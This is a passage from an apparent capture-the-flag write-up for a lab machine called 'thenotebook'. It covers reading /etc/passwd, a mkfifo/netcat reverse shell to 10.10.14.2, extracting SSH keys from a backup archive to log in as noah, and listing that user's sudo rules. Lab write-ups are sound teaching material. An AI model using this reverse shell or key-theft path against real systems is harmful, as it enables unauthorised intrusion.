4 shell

There is some AV / firewall that is deleting the php shell evertime

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
noah:x:1000:1000:Noah:/home/noah:/bin/bash

As shell is dying out and .php file is being deleted Setting up a stable bash connection using

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.2 443 >/tmp/f

Enumerating I find home.tar.gz in /var/backups

cp home.tar.gz /tmp
tar -xf home.tar.gz

=> We find .ssh keys

$ chmod 600 id_rsa
$ ssh -i id_rsa noah@10.10.10.230
noah@thenotebook:~$ whoami;id
noah
uid=1000(noah) gid=1000(noah) groups=1000(noah)

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

Last updated